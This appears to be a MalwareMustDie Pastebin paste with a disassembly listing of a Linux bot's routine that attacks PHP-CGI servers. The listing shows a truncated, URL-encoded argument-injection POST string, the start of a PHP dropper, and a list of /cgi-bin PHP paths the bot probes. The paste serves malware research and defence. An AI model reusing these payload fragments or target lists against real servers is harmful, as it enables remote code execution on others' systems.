Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- // Malwaremustdie!
- // redundant attack RFI by BossaBot
- :
- .text:0x80049B58 push ebp
- .text:0x80049B59 mov ebp, esp
- .text:0x80049B5B push edi
- .text:0x80049B5C push esi
- .text:0x80049B5D push ebx
- .text:0x80049B5E mov eax, offset aPostS?2d64616c ; "POST %s?%%2D%%64+%%61%%6C%%6C%%6F%%77%%"...
- .text:0x80049B63 sub esp, 0AE8h ; Integer Subtraction
- .text:0x80049B69 cld ; Clear Direction Flag
- .text:0x80049B6A mov esi, eax
- .text:0x80049B6C mov ecx, 125h
- .text:0x80049B71 lea edi, [ebp+var_4B8] ; Load Effective Address
- .text:0x80049B77 rep movsd ; Move Byte(s) from String to String
- .text:0x80049B79 mov eax, offset a?phpTmpSys_get ; "<?php\n$tmp = sys_get_temp_dir();\n$path "...
- .text:0x80049B7E movsb ; Move Byte(s) from String to String
- .text:0x80049B7F mov ecx, 63h
- .text:0x80049B84 mov esi, eax
- .text:0x80049B86 lea edi, [ebp+var_648] ; Load Effective Address
- .text:0x80049B8C rep movsd ; Move Byte(s) from String to String
- .text:0x80049B8E movsw ; Move Byte(s) from String to String
- .text:0x80049B90 movsb ; Move Byte(s) from String to String
- .text:0x80049B91 push [ebp+size] ; size
- .text:0x80049B94 call _gethostbyname ; Call Procedure
- .text:0x80049B99 mov ds:dword_0x8051B00, eax
- .text:0x80049B9E mov [esp+0AF8h+var_AF8], 0Dh
- .text:0x80049BA5 call _malloc ; Call Procedure
- .text:0x80049BAA add esp, 10h ; Add
- .text:0x80049BAD test eax, eax ; Logical Compare
- .text:0x80049BAF jz short loc_0x8049BC2 ; Jump if Zero (ZF=1)
- .text:0x80049BB1 push ecx
- .text:0x80049BB2 push 0Dh ; size_t
- .text:0x80049BB4 push offset aCgiBinPhp ; "/cgi-bin/php"
- .text:0x80049BB9 push eax ; void *
- .text:0x80049BBA call _memcpy ; Call Procedure
- .text:0x80049BBF add esp, 10h ; Add
- .text:0x80049BC2
- .text:0x80049BC2 loc_0x8049BC2: ; cod xref:: sub_0x8049B58+57
- .text:0x80049BC2 sub esp, 0Ch ; Integer Subtraction
- .text:0x80049BC5 push 0Eh ; size
- .text:0x80049BC7 mov [ebp+var_AA8], eax
- .text:0x80049BCD call _malloc ; Call Procedure
- .text:0x80049BD2 add esp, 10h ; Add
- .text:0x80049BD5 test eax, eax ; Logical Compare
- .text:0x80049BD7 jz short loc_0x8049BEA ; Jump if Zero (ZF=1)
- .text:0x80049BD9 push edx
- .text:0x80049BDA push 0Eh ; size_t
- .text:0x80049BDC push offset aCgiBinPhp5 ; "/cgi-bin/php5"
- .text:0x80049BE1 push eax ; void *
- .text:0x80049BE2 call _memcpy ; Call Procedure
- .text:0x80049BE7 add esp, 10h ; Add
- .text:0x80049BEA
- .text:0x80049BEA loc_0x8049BEA: ; cod xref:: sub_0x8049B58+7F
- .text:0x80049BEA sub esp, 0Ch ; Integer Subtraction
- .text:0x80049BED push 11h ; size
- .text:0x80049BEF mov [ebp+var_AA4], eax
- .text:0x80049BF5 call _malloc ; Call Procedure
- .text:0x80049BFA add esp, 10h ; Add
- .text:0x80049BFD test eax, eax ; Logical Compare
- .text:0x80049BFF jz short loc_0x8049C12 ; Jump if Zero (ZF=1)
- .text:0x80049C01 push edi
- .text:0x80049C02 push 11h ; size_t
- .text:0x80049C04 push offset aCgiBinPhpCgi ; "/cgi-bin/php-cgi"
- .text:0x80049C09 push eax ; void *
- .text:0x80049C0A call _memcpy ; Call Procedure
- .text:0x80049C0F add esp, 10h ; Add
- .text:0x80049C12
- .text:0x80049C12 loc_0x8049C12: ; cod xref:: sub_0x8049B58+A7
- .text:0x80049C12 sub esp, 0Ch ; Integer Subtraction
- .text:0x80049C15 push 11h ; size
- .text:0x80049C17 mov [ebp+var_AA0], eax
- .text:0x80049C1D call _malloc ; Call Procedure
- .text:0x80049C22 add esp, 10h ; Add
- .text:0x80049C25 test eax, eax ; Logical Compare
- .text:0x80049C27 jz short loc_0x8049C3A ; Jump if Zero (ZF=1)
- .text:0x80049C29 push esi
- .text:0x80049C2A push 11h ; size_t
- .text:0x80049C2C push offset aCgiBinPhp_cgi ; "/cgi-bin/php.cgi"
- .text:0x80049C31 push eax ; void *
- .text:0x80049C32 call _memcpy ; Call Procedure
- .text:0x80049C37 add esp, 10h ; Add
- .text:0x80049C3A
- .text:0x80049C3A loc_0x8049C3A: ; cod xref:: sub_0x8049B58+CF
- .text:0x80049C3A sub esp, 0Ch ; Integer Subtraction
- .text:0x80049C3D push 0Eh ; size
- .text:0x80049C3F mov [ebp+var_A9C], eax
- .text:0x80049C45 call _malloc ; Call Procedure
- .text:0x80049C4A add esp, 10h ; Add
- .text:0x80049C4D test eax, eax ; Logical Compare
- .text:0x80049C4F jz short loc_0x8049C62 ; Jump if Zero (ZF=1)
- .text:0x80049C51 push ebx
- .text:0x80049C52 push 0Eh ; size_t
- .text:0x80049C54 push offset aCgiBinPhp4 ; "/cgi-bin/php4"
- .text:0x80049C59 push eax ; void *
- .text:0x80049C5A call _memcpy ; Call Procedure
- .text:0x80049C5F add esp, 10h ; Add
- .text:0x80049C62
- .text:0x80049C62 loc_0x8049C62: ; cod xref:: sub_0x8049B58+F7
- .text:0x80049C62 sub esp, 0Ch ; Integer Subtraction
- .text:0x80049C65 push 12h ; size
- .text:0x80049C67 mov [ebp+var_A98], eax
- .text:0x80049C6D call _malloc ; Call Procedure
- .text:0x80049C72 add esp, 10h ; Add
- .text:0x80049C75 test eax, eax ; Logical Compare
- .text:0x80049C77 jz short loc_0x8049C8A ; Jump if Zero (ZF=1)
- .text:0x80049C79 push ecx
- .text:0x80049C7A push 12h ; size_t
- .text:0x80049C7C push offset aCgiBinPhp5Cgi ; "/cgi-bin/php5-cgi"
- .text:0x80049C81 push eax ; void *
- .text:0x80049C82 call _memcpy ; Call Procedure
- .text:0x80049C87 add esp, 10h ; Add
- .text:0x80049C8A
- .text:0x80049C8A loc_0x8049C8A: ; cod xref:: sub_0x8049B58+11F
- .text:0x80049C8A sub esp, 0Ch ; Integer Subtraction
- .text:0x80049C8D push 12h ; size
- .text:0x80049C8F mov [ebp+var_A94], eax
- .text:0x80049C95 call _malloc ; Call Procedure
- .text:0x80049C9A add esp, 10h ; Add
- .text:0x80049C9D test eax, eax ; Logical Compare
- .text:0x80049C9F jz short loc_0x8049CB2 ; Jump if Zero (ZF=1)
- .text:0x80049CA1 push edx
- .text:0x80049CA2 push 12h ; size_t
- .text:0x80049CA4 push offset aCgiBinPhp4Cgi ; "/cgi-bin/php4-cgi"
- .text:0x80049CA9 push eax ; void *
- .text:0x80049CAA call _memcpy ; Call Procedure
- .text:0x80049CAF add esp, 10h ; Add
- .text:0x80049CB2
- .text:0x80049CB2 loc_0x8049CB2: ; cod xref:: sub_0x8049B58+147
- .text:0x80049CB2 sub esp, 0Ch ; Integer Subtraction
- .text:0x80049CB5 push 12h ; size
- .text:0x80049CB7 mov [ebp+var_A90], eax
- .text:0x80049CBD call _malloc ; Call Procedure
- .text:0x80049CC2 add esp, 10h ; Add
- .text:0x80049CC5 test eax, eax ; Logical Compare
- .text:0x80049CC7 jz short loc_0x8049CDA ; Jump if Zero (ZF=1)
- .text:0x80049CC9 push edi
- .text:0x80049CCA push 12h ; size_t
- .text:0x80049CCC push offset aCgiBinPhp5_cgi ; "/cgi-bin/php5.cgi"
- .text:0x80049CD1 push eax ; void *
- .text:0x80049CD2 call _memcpy ; Call Procedure
- .text:0x80049CD7 add esp, 10h ; Add
- .text:0x80049CDA
- .text:0x80049CDA loc_0x8049CDA: ; cod xref:: sub_0x8049B58+16F
- .text:0x80049CDA sub esp, 0Ch ; Integer Subtraction
- .text:0x80049CDD push 12h ; size
- .text:0x80049CDF mov [ebp+var_A8C], eax
- .text:0x80049CE5 call _malloc ; Call Procedure
- .text:0x80049CEA add esp, 10h ; Add
- .text:0x80049CED test eax, eax ; Logical Compare
- .text:0x80049CEF jz short loc_0x8049D02 ; Jump if Zero (ZF=1)
- .text:0x80049CF1 push esi
- .text:0x80049CF2 push 12h ; size_t
- .text:0x80049CF4 push offset aCgiBinPhp4_cgi ; "/cgi-bin/php4.cgi"
- .text:0x80049CF9 push eax ; void *
- .text:0x80049CFA call _memcpy ; Call Procedure
- .text:0x80049CFF add esp, 10h ; Add
- .text:0x80049D02
- .text:0x80049D02 loc_0x8049D02: ; cod xref:: sub_0x8049B58+197
- .text:0x80049D02 sub esp, 0Ch ; Integer Subtraction
- .text:0x80049D05 push 13h ; size
- .text:0x80049D07 mov [ebp+var_A88], eax
- .text:0x80049D0D call _malloc ; Call Procedure
- .text:0x80049D12 add esp, 10h ; Add
- .text:0x80049D15 test eax, eax ; Logical Compare
- .text:0x80049D17 jz short loc_0x8049D2A ; Jump if Zero (ZF=1)
- .text:0x80049D19 push ebx
- .text:0x80049D1A push 13h ; size_t
- .text:0x80049D1C push offset aCgiBinPhp52_cg ; "/cgi-bin/php52.cgi"
- .text:0x80049D21 push eax ; void *
- .text:0x80049D22 call _memcpy ; Call Procedure
- .text:0x80049D27 add esp, 10h ; Add
- .text:0x80049D2A
- .text:0x80049D2A loc_0x8049D2A: ; cod xref:: sub_0x8049B58+1BF
- .text:0x80049D2A sub esp, 0Ch ; Integer Subtraction
- .text:0x80049D2D push 13h ; size
- .text:0x80049D2F mov [ebp+var_A84], eax
- .text:0x80049D35 call _malloc ; Call Procedure
- .text:0x80049D3A add esp, 10h ; Add
- .text:0x80049D3D test eax, eax ; Logical Compare
- .text:0x80049D3F jz short loc_0x8049D52 ; Jump if Zero (ZF=1)
- .text:0x80049D41 push ecx
- .text:0x80049D42 push 13h ; size_t
- .text:0x80049D44 push offset aCgiBinPhp53_cg ; "/cgi-bin/php53.cgi"
- .text:0x80049D49 push eax ; void *
- .text:0x80049D4A call _memcpy ; Call Procedure
- .text:0x80049D4F add esp, 10h ; Add
- .text:0x80049D52
- .text:0x80049D52 loc_0x8049D52: ; cod xref:: sub_0x8049B58+1E7
- .text:0x80049D52 sub esp, 0Ch ; Integer Subtraction
- .text:0x80049D55 push 0Ah ; size
- .text:0x80049D57 mov [ebp+var_A80], eax
- .text:0x80049D5D call _malloc ; Call Procedure
- .text:0x80049D62 add esp, 10h ; Add
- .text:0x80049D65 test eax, eax ; Logical Compare
- .text:0x80049D67 jz short loc_0x8049D7A ; Jump if Zero (ZF=1)
- .text:0x80049D69 push edx
- .text:0x80049D6A push 0Ah ; size_t
- .text:0x80049D6C push offset aCgiBin ; "/cgi-bin/"
- .text:0x80049D71 push eax ; void *
- .text:0x80049D72 call _memcpy ; Call Procedure
- .text:0x80049D77 add esp, 10h ; Add
- .text:0x80049D7A
- .text:0x80049D7A loc_0x8049D7A: ; cod xref:: sub_0x8049B58+20F
- .text:0x80049D7A sub esp, 0Ch ; Integer Subtraction
- .text:0x80049D7D push 11h ; size
- .text:0x80049D7F mov [ebp+var_A7C], eax
- .text:0x80049D85 call _malloc ; Call Procedure
- .text:0x80049D8A add esp, 10h ; Add
- .text:0x80049D8D test eax, eax ; Logical Compare
- .text:0x80049D8F jz short loc_0x8049DA2 ; Jump if Zero (ZF=1)
- .text:0x80049D91 push edi
- .text:0x80049D92 push 11h ; size_t
- .text:0x80049D94 push offset aCgiSysPhpCgi ; "/cgi-sys/php-cgi"
- .text:0x80049D99 push eax ; void *
- .text:0x80049D9A call _memcpy ; Call Procedure
- .text:0x80049D9F add esp, 10h ; Add
- .text:0x80049DA2
- .text:0x80049DA2 loc_0x8049DA2: ; cod xref:: sub_0x8049B58+237
- .text:0x80049DA2 sub esp, 0Ch ; Integer Subtraction
- .text:0x80049DA5 push 2 ; size
- .text:0x80049DA7 mov [ebp+var_A78], eax
- .text:0x80049DAD call _malloc ; Call Procedure
- .text:0x80049DB2 add esp, 10h ; Add
- .text:0x80049DB5 test eax, eax ; Logical Compare
- .text:0x80049DB7 jz short loc_0x8049DCA ; Jump if Zero (ZF=1)
- .text:0x80049DB9 push esi
- .text:0x80049DBA push 2 ; size_t
- .text:0x80049DBC push 804DF2Bh ; void *
- .text:0x80049DC1 push eax ; void *
- .text:0x80049DC2 call _memcpy ; Call Procedure
- .text:0x80049DC7 add esp, 10h ; Add
- :
- ;;---------
- ;; #MalwareMustDie!!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement